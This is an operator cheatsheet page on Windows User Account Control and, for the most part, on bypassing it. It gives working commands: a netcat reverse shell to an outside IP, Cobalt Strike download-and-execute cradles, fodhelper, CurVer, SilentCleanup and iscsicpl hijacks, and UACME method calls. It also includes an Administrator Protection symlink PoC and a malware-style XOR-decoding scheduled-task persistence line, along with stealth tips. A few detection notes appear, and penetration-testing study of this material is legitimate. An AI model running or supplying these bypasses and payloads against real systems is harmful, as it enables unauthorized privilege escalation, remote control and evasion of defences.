daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

uac-user-account-control.md (34699B)


      1 ---
      2 title: "UAC - User Account Control"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # UAC - User Account Control
     14 
     15 ## UAC
     16 
     17 [User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**. Applications have different `integrity` levels, and a program with a **high level** can perform tasks that **could potentially compromise the system**. When UAC is enabled, applications and tasks always **run under the security context of a non-administrator account** unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. It is a convenience feature that protects administrators from unintended changes but is not considered a security boundary.<sup>[[2]](#references)</sup>
     18 
     19 For more info about integrity levels:
     20 
     21 
     22 [Integrity Levels](/hacktricks/windows-hardening/windows-local-privilege-escalation/integrity-levels)
     23 
     24 When UAC is in place, an administrator user is given 2 tokens: a standard user token, to perform regular actions at medium integrity, and one with the admin privileges.
     25 
     26 This [page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) discusses how UAC works in great depth and includes the logon process, user experience, and UAC architecture.<sup>[[2]](#references)</sup> Administrators can use security policies to configure how UAC works specific to their organization at the local level (using secpol.msc), or configured and pushed out via Group Policy Objects (GPO) in an Active Directory domain environment. The various settings are discussed in detail [here](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings). There are 10 Group Policy settings that can be set for UAC. The following table provides additional detail:
     27 
     28 | Group Policy Setting                                                                                                                                                                                                                                                                                                                                                           | Registry Key                | Default Setting                                              |
     29 | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
     30 | [User Account Control: Admin Approval Mode for the built-in Administrator account](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account)                                                                                                           | `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken`   | `0` (Disabled)                                             |
     31 | [User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                                                                     | `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin` | `5` (Prompt for consent for non-Windows binaries on the secure desktop) |
     32 | [User Account Control: Behavior of the elevation prompt for standard users](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                                                             | `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser`  | `1` (Prompt for credentials on the secure desktop)         |
     33 | [User Account Control: Detect application installations and prompt for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings#user-account-control-detect-application-installations-and-prompt-for-elevation)                                                                                                 | `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection`   | `1` (Enabled; disabled by default on Enterprise)           |
     34 | [User Account Control: Only elevate executables that are signed and validated](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated)                                                             | `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures` | `0` (Disabled)                                             |
     35 | [User Account Control: Only elevate UIAccess applications that are installed in secure locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations)                                                             | `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths`       | `1` (Enabled)                                              |
     36 | [User Account Control: Run all administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings#user-account-control-run-all-administrators-in-admin-approval-mode)                                                                                                                            | `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA`                  | `1` (Enabled)                                              |
     37 | [User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop)                                   | `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle`     | `0` (Disabled)                                             |
     38 | [User Account Control: Switch to the secure desktop when prompting for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation)                                                                               | `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop`      | `1` (Enabled)                                              |
     39 | [User Account Control: Virtualize file and registry write failures to per-user locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations)                                                                     | `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization`       | `1` (Enabled)                                              |
     40 
     41 ### Policies for installing software on Windows
     42 
     43 The **local security policies** ("secpol.msc" on most systems) are configured by default to **prevent non-admin users from performing software installations**. This means that even if a non-admin user can download the installer for your software, they won't be able to run it without an admin account.
     44 
     45 ### Registry Keys to Force UAC to Ask for Elevation
     46 
     47 As a standard user with no admin rights, you can make sure the "standard" account is **prompted for credentials by UAC** when it attempts to perform certain actions. This action would require modifying certain **registry keys**, for which you need admin permissions, unless there is a **UAC bypass**, or the attacker is already logged as admin.
     48 
     49 Even if the user is in the **Administrators** group, these changes force the user to **re-enter their account credentials** in order to perform administrative actions.
     50 
     51 **In practice this is only useful once you already have an elevated token, a UAC bypass, or a misconfiguration that lets you change these keys; otherwise the registry write itself is blocked.**
     52 
     53 The registry keys and entries that you must change are the following (with their default values in parentheses):
     54 
     55 - `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System`:
     56   - `ConsentPromptBehaviorUser` = 1 (3)
     57   - `ConsentPromptBehaviorAdmin` = 1 (5)
     58   - `PromptOnSecureDesktop` = 1 (1)
     59 
     60 This can also be done manually through the Local Security Policy tool. Once changed, administrative operations prompt the user to re-enter their credentials.
     61 
     62 ### Note
     63 
     64 **User Account Control is not a security boundary.** Therefore, standard users cannot break out of their accounts and gain administrator rights without a local privilege escalation exploit.
     65 
     66 ### Ask for 'full computer access' to a user
     67 
     68 ```powershell
     69 hostname | Set-Clipboard
     70 Enable-PSRemoting -SkipNetworkProfileCheck -Force
     71 
     72 cd C:\Users\hacedorderanas\Desktop
     73 New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
     74 Enter-PSSession -ComputerName hostname
     75 ```
     76 
     77 ### UAC Privileges
     78 
     79 - Internet Explorer Protected Mode uses integrity checks to prevent high-integrity-level processes (like web browsers) from accessing low-integrity-level data (like the temporary Internet files folder). This is done by running the browser with a low-integrity token. When the browser attempts to access data stored in the low-integrity zone, the operating system checks the integrity level of the process and allows access accordingly. This feature helps prevent remote code execution attacks from gaining access to sensitive data on the system.
     80 - When a user logs on to Windows, the system creates an access token that contains a list of the user's privileges. Privileges are defined as the combination of a user's rights and capabilities. The token also contains a list of the user's credentials, which are credentials that are used to authenticate the user to the computer and to resources on the network.
     81 
     82 ### Autoadminlogon
     83 
     84 To configure Windows to automatically log on a specific user at startup, set the **`AutoAdminLogon` registry key**. This is useful for kiosk environments or for testing purposes. Use this only on secure systems, as it exposes the password in the registry.
     85 
     86 Set the following keys using the Registry Editor or `reg add`:
     87 
     88 - `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`:
     89   - `AutoAdminLogon` = 1
     90   - `DefaultUsername` = username
     91   - `DefaultPassword` = password
     92 
     93 To revert to normal logon behavior, set `AutoAdminLogon` to 0.
     94 
     95 ## UAC bypass
     96 
     97 > [!TIP]
     98 > Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAC prompt appears
     99 
    100 The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.
    101 
    102 It is important to mention that it is **much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).**
    103 
    104 ### Fast triage from a medium-integrity shell
    105 
    106 Before trying a bypass, confirm you are in the right scenario and map the host build to known working methods:
    107 
    108 ```powershell
    109 whoami /groups
    110 reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
    111 reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
    112 reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop
    113 powershell -c "Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' | select ProductName,DisplayVersion,CurrentBuild,UBR"
    114 schtasks /Query /TN "\Microsoft\Windows\DiskCleanup\SilentCleanup"
    115 ```
    116 
    117 Practical notes:
    118 - If `EnableLUA=0`, you do not need a bypass: any admin token can request high integrity directly.
    119 - `ConsentPromptBehaviorAdmin=2` or `5` is the common scenario for auto-elevate / COM-based bypasses.
    120 - `Always Notify` raises the bar, but you should still test the exact build instead of assuming failure: UACME still tracks some `AlwaysNotify compatible` methods on modern Windows builds.<sup>[[3]](#references)</sup>
    121 
    122 ### UAC disabled
    123 
    124 If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
    125 
    126 ```bash
    127 #Put your reverse shell instead of "calc.exe"
    128 Start-Process powershell -Verb runAs "calc.exe"
    129 Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
    130 ```
    131 
    132 #### UAC bypass with token duplication
    133 
    134 - [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
    135 - [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
    136 
    137 ### **Very** Basic UAC "bypass" (full file system access)
    138 
    139 If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder).
    140 
    141 > [!WARNING]
    142 > **Looks like this trick isn't working anymore**
    143 
    144 ```bash
    145 net use Z: \\127.0.0.1\c$
    146 cd C$
    147 
    148 #Or you could just access it:
    149 dir \\127.0.0.1\c$\Users\Administrator\Desktop
    150 ```
    151 
    152 ### UAC bypass with cobalt strike
    153 
    154 The Cobalt Strike techniques will only work if UAC is not set at its max security level
    155 
    156 ```bash
    157 # UAC bypass via token duplication
    158 elevate uac-token-duplication [listener_name]
    159 # UAC bypass via service
    160 elevate svc-exe [listener_name]
    161 
    162 # Bypass UAC with Token Duplication
    163 runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
    164 # Bypass UAC with CMSTPLUA COM interface
    165 runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
    166 ```
    167 
    168 **Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.
    169 
    170 ### Elevated COM interfaces (`ICMLuaUtil` / `CMSTPLUA`)
    171 
    172 Auto-elevated COM objects remain a practical UAC surface on modern builds. `ICMLuaUtil` is still tracked by UACME as working on current Windows branches, and offensive tooling keeps adapting `CMSTPLUA` by combining an interactive desktop process, 64-bit execution, and sometimes PEB/process masquerading before invoking the COM Elevation Moniker.<sup>[[3]](#references)</sup>
    173 
    174 Practical tips:
    175 - Prefer a **64-bit** process in the user's **interactive session** (commonly `explorer.exe` or a child of it).
    176 - If a raw shell fails, retry from a BOF / UACME implementation instead of a naive `CreateProcess` wrapper.
    177 - Expect child execution to occur in a **separate elevated process**; many BOFs do not elevate the current beacon in-place.
    178 
    179 ### KRBUACBypass
    180 
    181 Documentation and tool in [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
    182 
    183 ### UAC bypass exploits
    184 
    185 [**UACME**](https://github.com/hfiref0x/UACME) is a collection of UAC bypass techniques. Compile it with Visual Studio or MSBuild; the build creates several executables (for example, `Source\Akagi\output\x64\Debug\Akagi.exe`), so select the method appropriate to the target build.<sup>[[3]](#references)</sup>\
    186 Be careful: some bypasses launch visible programs or prompts that can alert the user.<sup>[[3]](#references)</sup>
    187 
    188 UACME has the **build version from which each technique started working**.<sup>[[3]](#references)</sup> You can search for a technique affecting your versions:
    189 
    190 ```powershell
    191 PS C:\> [environment]::OSVersion.Version
    192 
    193 Major  Minor  Build  Revision
    194 -----  -----  -----  --------
    195 10     0      14393  0
    196 ```
    197 
    198 Also, using [this](https://en.wikipedia.org/wiki/Windows_10_version_history) page you get the Windows release `1607` from the build versions.
    199 
    200 A practical workflow is to first **score the host build**, and only then fire the matching method:
    201 
    202 ```batch
    203 python main.py --scan uac
    204 Akagi64.exe 33 C:\Windows\System32\cmd.exe
    205 ```
    206 
    207 - `WinPwnage` quickly compares the local build against its known UAC methods, which is useful to discard dead PoCs fast.<sup>[[4]](#references)</sup>
    208 - `UACME` remains the best public catalogue to map a bypass to a precise build. Version 3.7.1 added methods 83–85, while the preceding release re-tested existing methods against **Windows 11 25H2**; re-check the method table and release notes instead of assuming an old PoC still applies unchanged.<sup>[[3]](#references)[[9]](#references)</sup>
    209 
    210 ### Always Notify-capable WNF/UIAccess chains (UACME 3.7.1)
    211 
    212 `Always Notify` does not eliminate every UAC bypass. UACME 3.7.1 implements three new x64 methods that combine user-controlled environment/protocol state with elevated scheduled-task or UIAccess behavior, and marks all of them `AlwaysNotify compatible`:<sup>[[3]](#references)[[9]](#references)</sup>
    213 
    214 - **83 — UnifiedConsent:** redirect `SystemRoot` so the WNF-triggered `\Microsoft\Windows\ConsentUX\UnifiedConsent\UnifiedConsentSyncTask` makes elevated `taskhostw.exe` side-load `unifiedconsent.dll`. UACME tracks it from Windows 10 build 19041.
    215 - **84 — TabTip:** use the same environment-variable primitive against UIAccess `TabTip.exe`, which loads `windows.storage.dll`, `ApplicationTargetedFeatureDatabase.dll`, or `rsaenh.dll` depending on the build, then pivot from the resulting high-integrity UIAccess context. UACME tracks it from Windows 8.1 / Server 2016.
    216 - **85 — Narrator:** hijack the per-user `feedback-hub` protocol, drive Narrator with `Alt+CapsLock+F`, then launch a writable copy of `osk.exe` that side-loads `OskSupport.dll`. This requires an interactive desktop and is tracked from Windows 10 1809 / Server 2019.
    217 
    218 After building the payload units and Akagi as documented by UACME, invoke the matching method number (the optional command defaults to `cmd.exe`):
    219 
    220 ```batch
    221 Akagi64.exe 83 C:\Windows\System32\cmd.exe
    222 Akagi64.exe 84 C:\Windows\System32\cmd.exe
    223 Akagi64.exe 85 C:\Windows\System32\cmd.exe
    224 ```
    225 
    226 Methods 84 and 85 depend on UIAccess/desktop interaction, so do not expect them to work unchanged from Session 0 or a non-interactive service shell. All three manipulate environment/protocol state and stage DLLs; inspect the implementation and remove those artifacts after testing.<sup>[[3]](#references)[[9]](#references)</sup>
    227 
    228 ### UAC Bypass – fodhelper.exe (Registry hijack)
    229 
    230 The trusted binary `fodhelper.exe` is auto-elevated on modern Windows. When launched, it queries the per-user registry path below without validating the `DelegateExecute` verb. Planting a command there allows a Medium Integrity process (user is in Administrators) to spawn a High Integrity process without a UAC prompt.
    231 
    232 Registry path queried by fodhelper:
    233 ```text
    234 HKCU\Software\Classes\ms-settings\Shell\Open\command
    235 ```
    236 
    237 <details>
    238 <summary>PowerShell steps (set your payload, then trigger)</summary>
    239 
    240 ```powershell
    241 # Optional: from a 32-bit shell on 64-bit Windows, spawn a 64-bit PowerShell for stability
    242 C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell -nop -w hidden -c "$PSVersionTable.PSEdition"
    243 
    244 # 1) Create the vulnerable key and values
    245 New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force | Out-Null
    246 New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force | Out-Null
    247 
    248 # 2) Set default command to your payload (example: reverse shell or cmd)
    249 # Replace <BASE64_PS> with your base64-encoded PowerShell (or any command)
    250 Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -e <BASE64_PS>" -Force
    251 
    252 # 3) Trigger auto-elevation
    253 Start-Process -FilePath "C:\\Windows\\System32\\fodhelper.exe"
    254 
    255 # 4) (Recommended) Cleanup
    256 Remove-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open" -Recurse -Force
    257 ```
    258 
    259 </details>
    260 Notes:
    261 - Works when the current user is a member of Administrators and UAC level is default/lenient (not Always Notify with extra restrictions).
    262 - Use the `sysnative` path to start a 64-bit PowerShell from a 32-bit process on 64-bit Windows.
    263 - Payload can be any command (PowerShell, cmd, or an EXE path). Avoid prompting UIs for stealth.
    264 
    265 #### CurVer/extension hijack variant (HKCU only)
    266 
    267 Recent samples abusing `fodhelper.exe` avoid `DelegateExecute` and instead **redirect the `ms-settings` ProgID** via the per-user `CurVer` value. The auto-elevated binary still resolves the handler under `HKCU`, so no admin token is needed to plant the keys:<sup>[[5]](#references)</sup>
    268 
    269 ```powershell
    270 # Point ms-settings to a custom extension (.thm) and map that extension to our payload
    271 New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
    272 New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
    273 Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force
    274 
    275 Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe
    276 ```
    277 
    278 Once elevated, malware commonly **disables future prompts** by setting `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin` to `0`, then performs additional defense evasion (e.g., `Add-MpPreference -ExclusionPath C:\ProgramData`) and recreates persistence to run as high integrity. A typical persistence task stores an **XOR-encrypted PowerShell script** on disk and decodes/executes it in-memory each hour:<sup>[[5]](#references)</sup>
    279 
    280 ```powershell
    281 schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"
    282 ```
    283 
    284 This variant still cleans up the dropper and leaves only the staged payloads, making detection rely on monitoring the **`CurVer` hijack**, `ConsentPromptBehaviorAdmin` tampering, Defender exclusion creation, or scheduled tasks that in-memory decrypt PowerShell.<sup>[[5]](#references)</sup>
    285 
    286 ### UAC bypass via `SilentCleanup` task (`HKCU\Environment\windir`)
    287 
    288 `SilentCleanup` launches `cleanmgr.exe` with highest privileges and expands `%windir%` from the user environment. If you control `HKCU\Environment\windir`, you can redirect that expansion to an arbitrary command and get high integrity without a consent dialog.<sup>[[8]](#references)</sup> This method is still worth testing on recent builds because UACME keeps the technique active and recent issue tracking shows Windows 11 24H2 may only require small quoting adjustments.<sup>[[3]](#references)</sup>
    289 
    290 ```batch
    291 reg add "HKCU\Environment" /v windir /d "cmd.exe /c start powershell.exe" /f
    292 schtasks /Run /TN "\Microsoft\Windows\DiskCleanup\SilentCleanup"
    293 reg delete "HKCU\Environment" /v windir /f
    294 ```
    295 
    296 If the task quotes the path on that build, retry with the payload ending in a quote (for example `cmd.exe"`). Always clean up `HKCU\Environment\windir` after testing.
    297 
    298 #### More UAC bypass
    299 
    300 Many classic UAC bypasses that abuse UI flows, COM objects, or desktop interaction require a **full interactive session** with the victim; a common `nc.exe` shell or a service running in **Session 0** is often not enough.
    301 
    302 You can often solve that using a **meterpreter** session. Migrate to a **process** that has the **Session** value equal to **1**:
    303 
    304 ![Point ms-settings to a custom extension (.thm) and map that extension to our payload - More UAC bypass: You can get using a meterpreter session. Migrate to a process that has the Session...](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28863%29.png)
    305 
    306 (_explorer.exe_ should works)
    307 
    308 ### UAC Bypass with GUI
    309 
    310 If you have access to a **GUI you can just accept the UAC prompt** when it appears; you do not really need a technical bypass. Therefore, obtaining a GUI session is often enough to bypass the practical friction added by UAC.
    311 
    312 Moreover, if you get a GUI session that someone was using (potentially via RDP) there are **some tools that will be running as administrator** from where you could **run** a **cmd** for example **as admin** directly without being prompted again by UAC like [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif). This might be a bit more **stealthy**.
    313 
    314 ### Noisy brute-force UAC bypass
    315 
    316 If noise is acceptable, a tool such as [**ForceAdmin**](https://github.com/Chainski/ForceAdmin) can repeatedly request elevation until the user accepts it.
    317 
    318 ### Your own bypass - Basic UAC bypass methodology
    319 
    320 If you take a look at **UACME** you will notice that **many UAC bypasses abuse DLL hijacking** (often by making an elevated binary load an attacker-controlled DLL from a writable path). [Read this to learn how to find a DLL hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking/index.html).
    321 
    322 1. Find a binary that will **autoelevate** (check that when it is executed it runs in a high integrity level).
    323 2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**.
    324 3. You probably will need to **write** the DLL inside some **protected paths** (like C:\Windows\System32) were you don't have writing permissions. You can bypass this using:
    325    1. **wusa.exe**: Windows 7,8 and 8.1. It allows to extract the content of a CAB file inside protected paths (because this tool is executed from a high integrity level).
    326    2. **IFileOperation**: Windows 10.
    327 4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
    328 
    329 ### Another UAC bypass technique
    330 
    331 Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
    332 
    333 ### UAC bypass via `SysWOW64\iscsicpl.exe` + user `PATH` DLL hijack
    334 
    335 The 32-bit `C:\Windows\SysWOW64\iscsicpl.exe` is an **auto-elevated** binary that can be abused to load `iscsiexe.dll` by search order. If you can place a malicious `iscsiexe.dll` inside a **user-writable** folder and then modify the current user `PATH` (for example via `HKCU\Environment\Path`) so that folder is searched, Windows may load the attacker DLL inside the elevated `iscsicpl.exe` process **without showing a UAC prompt**.<sup>[[1]](#references)[[6]](#references)</sup>
    336 
    337 Practical notes:
    338 - This is useful when the current user is in **Administrators** but running at **Medium Integrity** due to UAC.
    339 - The **SysWOW64** copy is the relevant one for this bypass. Treat the **System32** copy as a separate binary and validate behavior independently.
    340 - The primitive is a combination of **auto-elevation** and **DLL search-order hijacking**, so the same ProcMon workflow used for other UAC bypasses is useful to validate the missing DLL load.
    341 
    342 Minimal flow:
    343 
    344 ```batch
    345 copy iscsiexe.dll %TEMP%\iscsiexe.dll
    346 reg add "HKCU\Environment" /v Path /t REG_SZ /d "%TEMP%" /f
    347 C:\Windows\System32\cmd.exe /c C:\Windows\SysWOW64\iscsicpl.exe
    348 ```
    349 
    350 Detection ideas:
    351 - Alert on `reg add` / registry writes to `HKCU\Environment\Path` immediately followed by execution of `C:\Windows\SysWOW64\iscsicpl.exe`.
    352 - Hunt for `iscsiexe.dll` in **user-controlled** locations such as `%TEMP%` or `%LOCALAPPDATA%\Microsoft\WindowsApps`.
    353 - Correlate `iscsicpl.exe` launches with unexpected child processes or DLL loads from outside the normal Windows directories.
    354 
    355 ### Newer research worth checking separately
    356 
    357 Some post-2024 chains no longer look like the classic `HKCU\Software\Classes` registry hijacks. For example, activation-context cache poisoning can chain a **drive remap** and **DLL redirection** to move from medium to high integrity through trusted UI / auto-elevated binaries such as `ctfmon.exe` and later targets like `fodhelper.exe`. Instead of duplicating the large PoC here, check the compact payload examples in:
    358 
    359 [Windows C Payloads](/hacktricks/windows-hardening/windows-local-privilege-escalation/windows-c-payloads)
    360 
    361 ### Administrator Protection (preview) drive-letter hijack via per-logon-session DOS device map
    362 
    363 > [!NOTE]
    364 > As of August 2026, Microsoft still documents Administrator Protection as an **Insider preview**: the October 2025 rollout was reverted and is planned for a later date. Confirm that **Admin Approval Mode with Administrator protection** is actually enabled and the device has been rebooted before testing these chains; a stock 25H2 version string alone does not prove the feature is active.<sup>[[10]](#references)</sup>
    365 
    366 For the full `RAiLaunchAdminProcess` / UIAccess attack surface on Windows 11 25H2 preview builds, check the dedicated page:
    367 
    368 [Uiaccess Admin Protection Bypass](/hacktricks/windows-hardening/windows-local-privilege-escalation/uiaccess-admin-protection-bypass)
    369 
    370 Windows 11 25H2 “Administrator Protection” uses shadow-admin tokens with per-session `\Sessions\0\DosDevices/<LUID>` maps. The directory is created lazily by `SeGetTokenDeviceMap` on first `\??` resolution. If the attacker impersonates the shadow-admin token only at **SecurityIdentification**, the directory is created with the attacker as **owner** (inherits `CREATOR OWNER`), allowing drive-letter links that take precedence over `\GLOBAL??`.<sup>[[7]](#references)</sup>
    371 
    372 **Steps:**
    373 
    374 1. From a low-privileged session, call `RAiProcessRunOnce` to spawn a promptless shadow-admin `runonce.exe`.
    375 2. Duplicate its primary token to an **identification** token and impersonate it while opening `\??` to force creation of `\Sessions\0\DosDevices/<LUID>` under attacker ownership.
    376 3. Create a `C:` symlink there pointing to attacker-controlled storage; subsequent filesystem accesses in that session resolve `C:` to the attacker path, enabling DLL/file hijack without a prompt.
    377 
    378 **PowerShell PoC (NtObjectManager):**
    379 ```powershell
    380 $pid = Invoke-RAiProcessRunOnce
    381 $p = Get-Process -Id $pid
    382 $t = Get-NtToken -Process $p
    383 $id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
    384 Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
    385 $auth = Get-NtTokenId -Authentication -Token $id
    386 New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"
    387 ```
    388 
    389 On preview hosts, Administrator Protection records approvals and failures as ETW events **15031** and **15032** under the `Microsoft-Windows-LUA` provider. The events include the requester SID, application path, outcome, managed administrator account, and authentication method, so repeated exploit attempts or failed UI driving are not telemetry-free.<sup>[[10]](#references)</sup>
    390 
    391 ```batch
    392 logman start AdminProtectionTrace -p {93c05d69-51a3-485e-877f-1806a8731346} -ets
    393 rem reproduce the elevation attempt
    394 logman stop AdminProtectionTrace -ets
    395 ```
    396 
    397 
    398 ## References
    399 
    400 - [1] [LOLBAS: Iscsicpl.exe](https://lolbas-project.github.io/lolbas/Binaries/Iscsicpl/)
    401 - [2] [Microsoft Docs – How User Account Control works](https://learn.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works)
    402 - [3] [UACME – UAC bypass techniques collection](https://github.com/hfiref0x/UACME)
    403 - [4] [WinPwnage – UAC bypass compatibility scanner and launcher](https://github.com/rootm0s/WinPwnage)
    404 - [5] [Checkpoint Research – KONNI Adopts AI to Generate PowerShell Backdoors](https://research.checkpoint.com/2026/konni-targets-developers-with-ai-malware/)
    405 - [6] [Check Point Research – Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets](https://research.checkpoint.com/2026/operation-truechaos-0-day-exploitation-against-southeast-asian-government-targets/)
    406 - [7] [Project Zero – Bypassing Windows Administrator Protection](https://projectzero.google/2026/26/windows-administrator-protection.html)
    407 - [8] [Sigma / Detection.FYI – Bypass UAC Using SilentCleanup Task](https://detection.fyi/sigmahq/sigma/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/)
    408 - [9] [R41N3RZUF477 – UnifiedConsent, TabTip and Narrator Always Notify bypasses](https://github.com/hfiref0x/UACME/issues/173)
    409 - [10] [Microsoft Learn – Administrator protection](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/administrator-protection/)